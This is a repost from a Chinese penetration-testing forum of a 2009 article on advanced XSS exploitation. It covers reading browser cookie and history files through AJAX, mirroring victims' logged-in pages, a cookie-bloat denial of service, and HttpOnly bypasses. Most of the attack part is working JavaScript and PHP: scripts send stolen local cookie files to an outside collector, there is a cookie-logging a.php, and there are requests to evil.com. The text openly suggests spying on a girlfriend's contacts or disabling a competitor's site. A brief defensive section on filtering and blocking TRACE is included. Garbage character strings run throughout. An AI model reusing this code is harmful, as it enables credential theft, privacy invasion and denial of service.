中国网络渗透测试联盟

标题: XSS的高级利用部分总结 -蠕虫 [打印本页]

---

作者: admin    时间: 2012-9-13 17:13
标题: XSS的高级利用部分总结 -蠕虫
XSS的高级利用部分总结 -蠕虫,HTTP-only,AJAX本地文件操作,镜象网页
5 G6 a/ Z7 d4 G. |- E; U% K# k  E$ F本帖最后由 racle 于 2009-5-30 09:19 编辑

" o7 m/ r) [3 Q4 v3 MXSS的高级利用总结 -蠕虫,HTTPONLY,AJAX本地文件操作,镜象网页
- \9 A0 p+ z$ d2 W' J1 nBy racle@tian6.com   
/ u6 O  ^( o8 m  ]/ U# V6 d  hhttp://bbs.tian6.com/thread-12711-1-1.html
- H8 L) \$ s0 W* P" v转帖请保留版权


4 {; O! B$ B' W7 q4 a4 H3 X. b
-------------------------------------------前言---------------------------------------------------------
' P4 R0 I: F" {8 K2 ^- y$ t+ o

本文将撇开XSS语句,JS脚本,如何无错插入XSS语句,如何过滤和绕过XSS语句过滤,CSRF等知识点.也就是说,你必须已经具备一定XSS知识,才能看懂本文.


8 T* d) K% W3 A' \8 ^( w如果你还未具备基础XSS知识,以下几个文章建议拜读:
0 S& `$ X& m& W3 h+ Thttp://www.lib.tsinghua.edu.cn/chinese/INTERNET/JavaScript/        JavaScript中文简介
http://www.google.com/search?q=XSS+%D3%EF%BE%E4        XSS语句大全
2 P: j; ^# w: v8 Ehttp://www.google.com/search?q=XSS+%C8%C6%B9%FD        XSS语句绕过
$ i6 a: R8 h4 ?# k& l  Dhttp://www.80vul.com/dzvul/sodb/03/sodb-2008-03.txt        FLASH CSRF
http://bbs.tian6.com/thread-12239-1-1.html        突破XSS字符数量限制执行任意JS代码
* t! J% b$ b( W. ?http://bbs.tian6.com/thread-12241-1-1.html        利用窗口引用漏洞和XSS漏洞实现浏览器劫持




如果本文内容在你眼里显得非常陌生,或者难以理解,或者干燥无味,那正代表你对XSS了解甚少.

希望天阳会员本着技术学习为主的精神,真正的学习和掌握每门安全技术.因此,如果你来天阳是因为你想真正学会一些什么东西的话,请静下心来,看懂,看透,实际测试弄通本文.那么你对XSS的驾驭能力,自然大幅提高.

; _8 O4 s& j7 M  d如果你认为XSS是无足轻重的问题,只不过是常见的一个弹窗,或者你认为XSS作用域狭窄,或者你认为XSS威力微不足道,那么请先看看以下片段:Twitter遭遇疯狂XSS    6次XSS蠕虫版本变化,

' K7 u4 |, N8 D% {) s1 N9 KBaidu xss蠕虫         感染了8700多个blog.媒体影响力,关注度巨大
0 [  e5 G" Z5 [- ^+ a
QQ ZONE,校内网XSS     感染过万QQ ZONE.
. b, A2 c& b; T8 ]5 [
OWASP MYSPACE XSS蠕虫        20小时内传染一百万用户,最后导致MySpace瘫痪
- m4 G3 d# H% L. ]$ d5 j% L; G
. y0 \7 c( i5 R5 y5 G+ I..........
, n9 A; d4 ~5 T# X7 r" a8 R复制代码------------------------------------------介绍-------------------------------------------------------------

  x4 K& s+ c$ H3 F什么是XSS?XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的.XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性.
8 S2 f" C5 }5 F+ ?
4 e! j& ?/ U/ v

跨站攻击有多种方式,由HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码——例如记录论坛保存的用户信息（Cookie）,由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失.当然,攻击者有时也会在网页中加入一些以.JS 或.VBS为后尾名的代码时,在我们浏览时,同样我们也会被攻击到.

6 l& o, o: B- c( B6 `/ D

如何寻找,如何绕过各种限制,成功无错的执行XSS代码,我们在这里并不讨论.相关的文章在网上也有很多.
复制代码现今XSS替代了SQL-INJECTION,成为web security课题的首位安全问题.XSS已经成为WEB安全的重要课题.
4 W! n* d7 I1 B我们在这里重点探讨以下几个问题:

1        通过XSS,我们能实现什么?
8 u- d) j- T3 u8 F, A% [
9 u* W8 r( V) w5 U- O" K  P2        如何通过HTTP-only保护COOKIES. 又如何突破HTTP-only,又如何补救?
9 n. o  l, L" l( |4 |% _% l
3        XSS的高级利用和高级综合型XSS蠕虫的可行性?

; \8 A0 h9 a  j4 c6 R* ~" `4        XSS漏洞在输出和输入两个方面怎么才能避免.


: V) l+ h: J/ d0 b
  f6 }) ~; }$ z$ m------------------------------------------研究正题----------------------------------------------------------
. O. d- n2 e* ~: ?
$ ^0 |, W1 b9 a$ n+ Z% [7 t& h+ r# N
+ y0 L$ o# {$ K! e5 r
通过XSS,我们能实现什么?通过XSS,我们可以获得用户的COOKIES等信息,模拟用户本身进行HTTP提交,读取客户端本地文件,欺骗社工.结合以上功能,我们还能写出综合高级蠕虫.
复制代码XSS的高级利用与及综合性XSS高级蠕虫:我们主要讨论XSS在不同的浏览器下的权限限制&&XSS截屏;镜象网页,http only bypass(Cross-Site Tracing XST).写出我们自己的高级XSS蠕虫
9 R4 F  X7 Z3 ~' n$ x2 O( C  z+ x复制代码XSS漏洞在输出和输入两个方面怎么才能避免.
4 K- d! s# `& z* {1:为网站各个动态页面分安全等级,划分重点和次重点区域,分等级采用不同的输入限制规则.
& I% M* h4 r/ ?5 m& o2:严格控制输入类型,根据实际需求选用数字,字符,特殊格式的限制.
3:在浏览器端输出时对HTML特殊字符进行了转义,常见采用htmlspecialchars,htmlentities.但是过滤了特殊字符,并不意味就是安全的.很多绕过方法都是争对单纯过滤进行的,譬如URL,8进制,16进制,String.fromCharCode转编码,UBB绕过等.因此应注意每处接受动态输入的代码审计.数据保存在innertxt,标签属性均应处于“”内.
4:Http-only可以采用作为COOKIES保护方式之一.
' G: y0 i. \# e  H! y6 S* X" ]

& x" K9 n. ], k* P0 u  Y


(I) AJAX在不同的浏览器下的本地文件操作权限读取本地的COOKIES,常见的敏感文件如:FTP的INI,etc/shadow,各种第三方应用程序的敏感文件等,并且将内容反馈给攻击者)
( }5 g* W" R: i0 ]( o0 W3 p5 ^. T! j
. x) N# X+ o2 k# M# x我们可以参考空虚浪子心的两篇文章,与及XEYE TEAM的统计信息:    1: ie6可读取无限制本地文件.ie8以及相应版本的trident内核浏览器对ajax本地执行时的权限控制得很死的，看来MS对IE这类安全风险比较重视。(这有一些问题，随后修正!)
( p0 X& P+ B( A% b+ r) ^( b

6 N: O# e# a6 j4 `" j8 P& E! G
    2: ff 3.0.8及以下版本允许本地执行的ajax访问当前目录下的文件内容。其他目录暂无法访问。

) N: C' s; [' Z$ V  N
4 K0 i% T, V) b
' x% p+ i8 ]# x9 T9 Y4 \    3: opera9.64及以下版本允许通过指定url为file://协议进行访问；如果文件在当前目录下，则不需要指定file://协议；如果文件在同一盘符下甚至可以超越目录的方式访问:../../boot.ini。


2 ~4 Q! Z9 |# `3 k4 P; S2 k+ I
( J4 i* p2 q5 v$ T5 E: `    4: 基于webkit内核：google chrome、遨游3.0、safari等浏览器对本地执行的ajax权限没做任何访问限制.
; \' x3 d% I0 R/ h( k# Q8 O) U0 G# l: K复制代码IE6使用ajax读取本地文件    <script>
% g; S$ ~2 N1 O) ~6 Y) [
    function $(x){return document.getElementById(x)}
, B0 I2 N0 I) V& d


/ K& S4 h" ~, _' Z3 y    function ajax_obj(){
7 k/ Y- w( Q& g3 v* P
    var request = false;
+ [/ x% q$ k" L) ^3 E0 _" P" Q8 _
/ T3 ?* C+ f, c9 k% {  @    if(window.XMLHttpRequest) {

; y, ?  p+ e7 \1 g    request = new XMLHttpRequest();

    } else if(window.ActiveXObject) {
% g' g! s6 N3 r9 g9 ^7 C, e$ _" W" ^
6 c9 _1 K8 N4 ^2 f    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
. I& U& e0 \; a# k3 [4 h' Q
& K+ `$ u; V3 R9 V

    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

+ z0 I8 N5 _3 P: e* q' F0 }  g, V    for(var i=0; i<versions.length; i++) {
2 c$ n* L& S& v5 T
    try {

) N9 d+ H) l' p, f1 N    request = new ActiveXObject(versions);
0 p7 A  w8 n3 X5 e7 \+ f
    } catch(e) {}

    }
8 ?4 @0 K- I; h( i" V8 e. ~, [! E
    }

/ w! e7 C1 A8 N+ y/ Q) Z    return request;

" f( j, {- x7 ?& C; a    }

    var _x = ajax_obj();

    function _7or3(_m,action,argv){
. m* R" e# e$ y) ~' O
% w7 l1 P" ~. X" O: p' Z+ ?8 l; z    _x.open(_m,action,false);

" S6 U8 B$ a% m/ I    if(_m=="OST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
3 H& R# r, i% ?7 O" W
; I7 ?& j7 L& v$ y6 j    _x.send(argv);

  x% |1 e9 P  M' y* r* ]5 [8 O- t    return _x.responseText;
' ~' y( Q. Q4 S& Q
    }

" w9 Z. u( o! R

2 T( D* d; ^% }( R  n3 t! B    var txt=_7or3("GET","file://localhost/C:/11.txt",null);

% s" R) y) m2 u' @5 s% X    alert(txt);
: X0 r' V5 Q8 D7 b4 m* G


) q) @2 x$ u. Q+ h1 p5 m0 v    </script>
复制代码FIREFOX 3使用ajax读取本地文件,仅能读取同目录,及其下属目录下文件.    <script>

    function $(x){return document.getElementById(x)}


% P) B0 ~9 k0 `, [6 d) f: w
    function ajax_obj(){
" ]  W" N8 C5 H1 F  c( J, c$ ?
    var request = false;

( P2 j) _) }. G- B! P    if(window.XMLHttpRequest) {
% a9 s% |0 _, k6 Y. c4 D. D3 ~
' I, I4 l. |( e- u    request = new XMLHttpRequest();
. [. G5 I5 m$ [* V5 b, u
$ m3 X1 s3 C8 a. T. t# _    } else if(window.ActiveXObject) {
4 H+ u. J8 m) F4 j$ w5 Q
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',


8 h3 J* A$ T  ?0 t8 r. w! k' U
    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

+ e# e0 J  {) V. B    for(var i=0; i<versions.length; i++) {
- V" y! t* a& C5 g
6 W+ d, n+ {* ^0 @    try {

    request = new ActiveXObject(versions);
$ Z* N, @3 c# H
    } catch(e) {}

5 o# u8 Z! @) ?0 d$ k. f: \+ R    }

    }

    return request;

    }

; f, Y: k# @  A" l    var _x = ajax_obj();
1 [8 ?) t5 T$ i/ @
, _) j0 i) r2 ]; q# M    function _7or3(_m,action,argv){

    _x.open(_m,action,false);
0 b# D* v0 h7 ?: k# S( [
    if(_m=="OST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

    _x.send(argv);
3 n8 ~8 B' c7 @) |+ a4 B
% ^$ S$ L6 z; Q# @9 [- A    return _x.responseText;

    }
  u1 L' f" {0 |4 N: Q9 m


    var txt=_7or3("GET","1/11.txt",null);
' i$ P) A  ^# m5 R# x8 x" G% ?2 N
    alert(txt);

, W  J+ y! i; S% Q2 S: g/ F
( v9 S/ z3 d! O! ^
    </script>
复制代码Google Chrome使用ajax读取本地文件Chrome的cookie默认保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”



, V, p& ~3 x$ }2 a# ?+ LChrome的历史保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History"
, s) r( d4 N$ n4 p
1 `3 u8 [- @, N& `2 k/ V& i
2 o! q4 K2 ^* G6 X- \9 D. R9 ~
" V6 g  U7 Q; l! N<?   
3 @* R4 G+ t6 _, a
! D3 L) v$ w7 g1 j! W' B/*  
1 i9 b7 G. S) o6 v/ k( y
. }( g' ]7 y5 B7 F' x     Chrome 1.0.154.53 use ajax read local txt file and upload exp  
# _4 b2 H5 D. j+ ]6 P8 v( c$ M, H
     www.inbreak.net   
; t& C5 d# m* S
     author voidloafer@gmail.com 2009-4-22   

     http://www.inbreak.net/kxlzxtest/testxss/a.php get cookie and save.  

  R- ]+ s8 P- g, i2 T*/  

' R3 U0 `; }# _# S! M: Eheader("Content-Disposition: attachment;filename=kxlzx.htm");   

$ L7 n, ?. o! _6 g$ w1 [" Z. Fheader("Content-type: application/kxlzx");   
" f2 I% g; N( Q8 ?0 {* n& T
/*  

1 [4 H- {( q7 ?, Q7 U     set header, so just download html file,and open it at local.  
6 M1 E: k! B7 [/ _
*/  
' T0 k6 P5 y3 q4 W& ^
; B( k, h! T2 l, [' w, q" t?>   
* i# g! [; ]$ Y! K
<form id="form" action="http://www.inbreak.net/kxlzxtest/testxss/a.php" method="OST">   

6 N5 v3 l3 t6 m7 g1 k' o0 u8 Q     <input id="input" name="cookie" value="" type="hidden">   

</form>   

<script>   
0 y* x1 m, ~. j+ _& i
function doMyAjax(user)   
5 L9 m- h" C; t1 U. n1 e+ T
{   

+ R; L2 @6 t/ m" a& Xvar time = Math.random();   
% s" r. ]9 x& P6 Z
/*  
+ o. T! x6 B, x3 d8 j1 B  ]7 X& M
the cookie at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\Default  

and the history at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\History  
; X. k( v! C+ m$ I
0 C3 A4 l/ h$ S. X$ V5 zand so on...  
/ @- ~, ^0 w) y) i; A
*/  

var strPer = 'file://localhost/C:/Documents and Settings/'+user+'/Local Settings/Application Data/Google/Chrome/User Data/Default/Cookies?time='+time;   

   
5 c7 i* Y: M* u) d
( Q4 G0 c1 g/ n$ j9 kstartRequest(strPer);   


  \1 E/ V. ~% I
* b! _. J1 R: x3 V! Z" J% M}   

1 B6 k9 P2 {) ?7 i$ ~* A7 _   

function Enshellcode(txt)   
& |' N$ t! c, x% o! J  I! L
{   

( l8 }4 S+ f& u! n/ cvar url=new String(txt);   
; D7 |+ w, L' e& ?0 t0 z
var i=0,l=0,k=0,curl="";   
) n9 H* K  n1 I4 |$ k" b
1 ~0 P% ]* R1 F% B" ?( _l= url.length;   

4 @- H. s4 H: S. bfor(;i<l;i++){   

" a; y6 {5 L: z0 @- }3 W: @* ~" a. qk=url.charCodeAt(i);   
! J$ s* e/ i" j6 a$ g8 z
+ ~9 z) r  ~9 |9 Dif(k<16)curl+="0"+k.toString(16);else curl+=k.toString(16);}   

0 M, s7 X6 T# H1 S9 }  fif (l%2){curl+="00";}else{curl+="0000";}   

curl=curl.replace(/(..)(..)/g,"%u$2$1");   

! x. r. Q9 U* S) B$ p! N. zreturn curl;   

}   

   
& \) m7 ?  o" M7 }
   

- J6 F. \3 S4 m1 ]6 xvar xmlHttp;   
; o; G$ V& U7 X  A$ R6 w+ q9 W
function createXMLHttp(){   
' O" ]( c0 Y' J9 i4 @! C; i
7 c% X' }  n: r* I% {     if(window.XMLHttpRequest){   

xmlHttp = new XMLHttpRequest();           
4 G) N  c) R& J9 k8 p
     }   

     else if(window.ActiveXObject){   
! x# w: k2 `+ j
( h- T; P2 u/ x8 S5 z5 {2 K* m! {xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");   
' O$ y+ P! @2 L: R, [: U2 o) @3 i/ x
     }   

}   
* O5 v0 I+ A; k; D
  p5 S' L  T3 W/ K/ ~8 t   
; N  d" E6 D- B* i+ L0 U
/ G! ]$ B5 g, J, C% d; A  g. C) P5 bfunction startRequest(doUrl){   
) a9 `6 m/ h. N8 E3 i5 E( E0 x; S
4 |* \: q/ W. c/ Z, F. H   

4 {2 |4 S; {/ t- y+ I     createXMLHttp();   
: k# ?2 }% ~" H% R; ]* y3 L6 n! U
5 V$ W7 D. d- B5 x% H5 z5 r
2 C) j4 b9 w/ J# u7 j
     xmlHttp.onreadystatechange = handleStateChange;   
+ V, Z  ?4 \" K  H, a. j# A


     xmlHttp.open("GET", doUrl, true);   

: \+ ^/ I' u2 G. b+ o
; O- t8 Y+ y. ~
     xmlHttp.send(null);   
* M0 E6 H5 D3 K/ b. Q


6 ?. `4 b8 g; `# ?8 `+ k9 B. \
! z; p0 V+ V/ d7 C1 {
" u. ^  g& [* y( r! c* X}   

! b. f7 l, w1 {+ `: N8 y6 |1 Y   

3 P) @+ Y0 }& b2 ^8 Y1 R/ Ofunction handleStateChange(){   

     if (xmlHttp.readyState == 4 ){   

     var strResponse = "";   

5 b' N* o" M" @4 g+ g1 p+ y     setTimeout("framekxlzxPost(xmlHttp.responseText)", 3000);   
/ A$ X- M: z1 F7 Y- k  F
" M! X) ^3 z' [! a+ u        
- O) r( J5 ~, N% p# D6 h4 K
5 o' ?/ u- ^$ K3 a0 j     }   
% a+ f% T( |  e9 w) N) Y# U# ~
) l* g1 o4 m6 l}   
! J' q% s! O& @3 M
& }+ A  E* m0 p9 m' q, c, C0 Y   
9 U1 w* ^1 |  q# e  k- j
   
3 p+ x: z( t5 l7 _) P
function framekxlzxPost(text)   

/ I. @/ p: W) \! Q! Y) x# b: X/ \{   

- l, ]9 h! m4 U; V9 O2 }3 H& Z     document.getElementById("input").value = Enshellcode(text);   

     document.getElementById("form").submit();   
) g* r4 l* e7 ~
3 Q  w% P5 |, l/ l# V}   

" [: C! h; W* o: T   

doMyAjax("administrator");   

( i$ C9 c: T4 J0 M4 i! j% J   

</script>
复制代码opera 9.52使用ajax读取本地COOKIES文件<script>  

var xmlHttp;  
4 S, ^! T4 x& @  D$ a$ z9 |: |, U, d. y
, [$ }8 X  d( g8 gfunction createXMLHttp(){  

     if(window.XMLHttpRequest){  

, K  {( M( [$ n& g' v         xmlHttp = new XMLHttpRequest();         

     }  

' [# S, {( |. v0 _7 I: w     else if(window.ActiveXObject){  
: y% y, o5 c" ^! ^9 x: V6 y2 e" }
$ M% Z: k$ K. A2 F7 q% r! N& [         xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");  
' z$ `% Q$ `% r; Z
0 a* F$ Q' A( i     }  

}  

   
' I. h; i4 s: V3 e- o7 {* {5 ?( s
- r1 h" Y# r" Q( s# S" p9 kfunction startRequest(doUrl){  

8 d/ Y( m- C8 K; j6 }           

     createXMLHttp();  

  ~9 p! t' \8 h8 M' o* ?# g      

) X9 c2 D& v  e& w! J! H     xmlHttp.onreadystatechange = handleStateChange;  

      
3 B( F: e  G* s7 D
     xmlHttp.open("GET", doUrl, true);  
4 s/ x3 Z" u4 p8 y+ d" I
  ~7 f& u8 ~) g9 _# Y4 G! y      

9 \2 y/ s/ }" I$ _" f     xmlHttp.send(null);  

      

$ E* |6 e& ~+ n6 i- J2 _2 I+ c      
& @0 {/ |( O5 O! V6 @" E# P! _
}   
4 Z4 Y) D& P, L! N4 ^
! }2 x9 H2 w6 `, }: [   
4 `3 v: m( H, [* s! J
function handleStateChange(){  
# D( v1 o4 \( M
     if (xmlHttp.readyState == 4 ){  

             var strResponse = "";  
* m1 g8 ?( a+ n
             setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);   
5 h4 {% C; }1 B5 G1 `  e8 ^
: i2 L, Y, E( j! N- Y3 A               

     }  

}  

   

5 X% h" Q# b4 \) |5 qfunction doMyAjax(user,file)  

/ y* B& y$ V( @' E) v2 W# ?{  
  k& `3 r, C: z
" A6 G1 h# K% x" [         var time = Math.random();  
5 B6 s/ Q) z& S! Z% f9 J, A: u
           
1 Z9 f3 z8 O# R5 G9 A- D6 L) k
         var strPer = 'file://localhost/C:/Documents%20and%20Settings/'+user+'/Cookies/'+file+'?time='+time;  

           

         startRequest(strPer);  

  B% A# u+ U% ]; T, V1 ]- g      
% k3 g& @; ^* p: j9 S
! j9 Q7 @9 D0 Q9 V3 R}  
. s) l6 e% V. J# W
   
, ]: g$ V. Q% _
' h0 y7 X: R0 I7 @: f  zfunction framekxlzxPost(text)  

{  
2 `5 @( ~* K9 f; Q' J# C
     document.getElementById('framekxlzx').src="http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie="+escape(text);  

9 J! a+ ]9 ^2 B9 S4 a     alert(/ok/);  

}  
& ~- J0 m4 R& J3 D+ g) Q
* y' s# G' G0 E   
; ~. R- o  Y) \6 e& N9 Q; H9 M! f
doMyAjax('administrator','administrator@alibaba[1].txt');  

   
& K8 L' N  C+ }; M
</script>





a.php



% S5 D+ F+ b5 b<?php      
1 p0 B) }% Q" y) t$ l
   
5 K0 u1 a0 z1 D& z7 L0 y2 q# r
$user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];  

$user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"];   
3 Q" \, F/ F5 K
  

9 M( H6 z# g4 M- R  }% ^- ?* m$fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb");     
+ g, ~( X3 m, B5 ^
: _. F6 ~- z4 D. t& `fwrite($fp,$_GET["cookie"]);      

fclose($fp);   
: a1 B1 x$ m, w
?>
复制代码(II) XSS截屏-镜象网页与XSS实现DDOS:

, E1 x! o5 S" R) C或许你对你女朋友的校内网里的好友列表感兴趣,又或者你对你的客户部竞争对手的电话通信记录感兴趣,那么这个由XEYE TEAM提出的新想法,对你就有用.
利用XSS获得指定的受控者授权状态下的页面源代码,再传发到目标页面,处理好相对路径,那么攻击者就能截取任意一个受控端的授权状态下的镜象网页.达到类似远程控制程序截屏的功能.
# G/ Z0 r3 Z6 b: X" _: R. D: {9 k2 p
代码片段://xmlHttpReq.open("GET","AWebSiteWhichYouNeedToCatch.com",false);

' d, ?9 H9 z( L4 q. O//xmlHttpReq.open("GET","http://friend.xiaonei.com/myfriendlistx.do",false);
9 L/ U7 r/ P8 G$ j
//xmlHttpReq.open("GET","http://chinatelecom.com/mylistofnopermonth.jsp?no=139xxxxxxxx",false);

. A3 @; _/ @4 ?8 ]function getURL(s) {
7 N( ~8 `! o( h$ o: z- a, T
var image = new Image();

image.style.width = 0;

  f( ~3 Z, a. Qimage.style.height = 0;

0 y8 y2 y$ c# S7 y9 M8 h* B) Nimage.src = s;
) P+ ~  n: X. N0 E9 J
}
' m! r& R" v; u- L
# b7 s6 E% M# b( G5 a; PgetURL("http://urwebsite.com/get.php?pagescopies="+xmlHttpReq.responseText);
复制代码XSS也能大材小用DDOS? 利用XSS操作COOKIES,导致HEADER部分过大,引发IIS或APACHE等服务端CRASH或者拒绝响应.生效时长与COOKIES允许保存时间相等.
. q. f- k4 X; U& Z这里引用大风的一段简单代码:<script language="javascript">
8 {) K$ g( Q$ A2 \
0 K7 b( D5 |+ d2 L" k; Dvar metastr = "AAAAAAAAAA"; // 10 A
( h, T1 k; I$ w% W% a' t% B
1 z# p" B5 N2 @* \6 u+ Q. mvar str = "";

6 Z8 l! [8 Y: K( o! ~0 ]3 kwhile (str.length < 4000){

: G7 U' c( k3 _' M    str += metastr;

' k% f0 S* y0 R4 k- b3 \+ y$ l}
$ Q& ~! q4 U$ m+ l. e
3 b  [+ J7 c6 @/ Q) M8 R) x2 O
) h8 H" X' l, K# Z( N& J$ N
/ m* j7 a9 c0 p. U4 Qdocument.cookie = "evil3=" + "\<script\>alert(xss)\<\/script\>" +";expires=Thu, 18-Apr-2019 08:37:43 GMT;";    // 一些老版本的webserver可能在这里还会存在XSS

</script>
* M: b3 l8 `: U$ x
详细代码请看:http://hi.baidu.com/aullik5/blog ... aeaac0a7866913.html
复制代码如果你觉得XSS用来DDOS太可惜的话,这里也提供另外一篇文章供你参考,随与XSS无关,但是却也挺有意思.
server limit ddos利用随想 - 空虚浪子心 http://www.inbreak.net/?action=show&id=150
/ z& g, S, U7 r7 Y6 g% n! W
' {2 n( A$ A+ r5 r8 y  R6 {3 J假设msn.com出现了问题,被XSS了.并且攻击者把COOKIES 设置成yahoo.com的.那么所有访问msn.com的用户将无法访问yahoo.com.
; N' ~( o- u% m6 d, ~# T攻击者在自己的网站上iframe了server limit ddos,目标设置为竞争对手myass.com,那么所有访问过攻击者网站的人,将无法访问其同行竞争对手myass.com的网站,这样不很妙么?呵呵.


; o# N) d0 S# ]  y3 k" {
/ r% E2 f) F7 A6 R5 e* n/ l7 M


(III) Http only bypass 与 补救对策:
/ i4 S6 k: u1 V; N  A* I0 h6 _
什么是HTTP-ONLY?HTTP-ONLY为Cookie提供了一个新属性，用以阻止客户端脚本访问Cookie.
6 Y7 K, H9 G& Y- s% I1 C以下是测试采用HTTPONLY与不采用时,遭受XSS时,COOKIES的保护差别。<script type="text/javascript">

<!--

function normalCookie() {
7 ~+ u/ H8 g/ @  L
7 P$ y3 c; H; Q% P) p5 a$ x3 o% kdocument.cookie = "TheCookieName=CookieValue_httpOnly";
! _. a/ T+ o* x) Q% \) s2 a
9 o& P9 h- Q  b4 o9 T8 e1 ~( |alert(document.cookie);
, `5 X2 ]' O- F: i6 i6 g
}

% S4 Y+ p- x, t, r$ V6 A
$ l- ]% G9 H" J

8 e1 }6 x* h0 C* \& y
function httpOnlyCookie() {

, `$ X/ ]0 i+ u# I" x4 Ldocument.cookie = "TheCookieName=CookieValue_httpOnly; httpOnly";
8 P5 L2 O: l' c  i* c3 {
alert(document.cookie);}

. Z5 O+ B3 Q: Q2 s$ a, {9 ]

0 e, s2 p  I6 `; I. W//-->
8 @/ l5 a& p' {; a5 v
) ]2 K6 k5 r0 G9 M</script>
& W% Q2 Y1 a0 }  ]: w# W% e7 W' w* m
5 A; [5 W% d. R' F  h4 O9 G
' K% n& p. _# A3 s/ Q% K
<FORM><INPUT TYPE=BUTTON OnClick="normalCookie();" VALUE='Display Normal Cookie'>
, X5 n  A/ X. m6 y  ?  K7 L" i
; t' e% o" A6 r# C& T<INPUT TYPE=BUTTON OnClick="httpOnlyCookie();" VALUE='Display HTTPONLY Cookie'></FORM>
复制代码但是采用HTPPONLY就安全了吗?不一定.采用TRACE获得HEADER里的COOKIES:<script>



var request = false;

        if(window.XMLHttpRequest) {
& S6 }7 @  O' Y2 R
            request = new XMLHttpRequest();
/ D' E$ p% @7 V6 q
! u; ~' K% G, d/ k7 |3 O4 a3 v+ _            if(request.overrideMimeType) {

                request.overrideMimeType('text/xml');

            }

        } else if(window.ActiveXObject) {

" n" H/ l8 f1 X- j, B1 x; x            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
! F* A' G) J1 c( {; _1 v  ?& w
            for(var i=0; i<versions.length; i++) {

3 A: ~* j9 z6 E9 M$ C  i2 H  t                try {

                    request = new ActiveXObject(versions);

                } catch(e) {}

/ U. M6 z4 _5 o0 y( D9 F            }
+ J' P- w9 |3 c0 g$ V  F
6 S7 a# P$ P$ q; h& q        }

xmlHttp=request;
* Q8 x* ]2 n" h+ q2 Z. E9 x5 L; Z
xmlHttp.open("TRACE","http://www.vul.com",false);

xmlHttp.send(null);
- z8 g/ R* U1 h" r/ }' e) I8 {
% c1 |; ^9 A; ?# ]xmlDoc=xmlHttp.responseText;
5 @( p& N8 C4 ^% Y( b+ e$ x
& `6 `2 O2 t  U" X  ^, B# Jalert(xmlDoc);

! C, S' ]0 [4 p; c- F</script>
  P% z9 o9 m- i$ }/ b: b& \: `: ]8 d复制代码但是许多网站并不支持TRACE调试命令,那么我们还可以通过访问phpinfo();页面,筛选带有COOKIE的字段值.<script>
7 B, [$ N# l, D- h
5 s5 i3 J* U8 G% d8 V# fvar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

XmlHttp.open("GET","http://www.google.com",false);
7 E# u( B4 j1 {, M# T! B
9 J/ i/ S5 G+ f" zXmlHttp.setRequestHeader("Host","www.evil.com/collet.php");

XmlHttp.send(null);

5 O6 a8 B+ g. w$ Avar resource=xmlHttp.responseText

resource.search(/cookies/);

9 q8 {# j1 U, e2 Z/ _: S" l......................
2 O' k* p; e$ j. s
7 w% P# N: Z- g! w4 Q6 B</script>
0 ~* W6 H8 t& ?0 E
" J5 f( u+ J# R; s6 [- t1 K7 J


$ J( G/ i$ [( P, R  ^- F
& R! l) l! D0 h, }5 T如何防止对方采用TRACE访问你的网站?APACHE可以采用.htaccess来Rewrite TRACE请求

8 h% ~7 S$ H, J4 v0 C. P8 J[code]
! z6 ^9 S* g/ t" @* G- W
+ Z% b3 O: r4 ARewriteEngine On

RewriteCond %{REQUEST_METHOD} ^TRACE
$ e/ Q  W* P1 n4 q$ i
; [; _! v1 i6 _* U( Y2 T. uRewriteRule .* - [F]



% Y9 h! v2 V, t% R* S& |$ lSquid可以添加以下信息到Squid configuration file (squid.conf),屏蔽TRACE请求
& A/ N4 L1 g- }
acl TRACE method TRACE

( D& j% [( g! F2 O# J0 s3 Z...

1 ?( P5 r( s9 N" Rhttp_access deny TRACE
8 @9 r6 r0 |7 w! H& I6 _1 p复制代码突破还可以采用XmlHttp.setRequestHeader.通过setRequestHeader,把COOKIES等信息转向到目标页面.<script>

: z# T' n5 i8 i& c8 q% q, svar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
6 C. u, y, b6 W
XmlHttp.open("GET","http://www.google.com",false);

XmlHttp.setRequestHeader("Host","www.evil.com/collet.php");

XmlHttp.send(null);

</script>
复制代码当Apache启动了mod_proxy,还可以使用proxy方式作为中间人方式获得受保护COOKIES.<script>

, v2 f, [( T  A) Svar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");


( t* p, t: R8 ^3 ]' E$ w# K' K
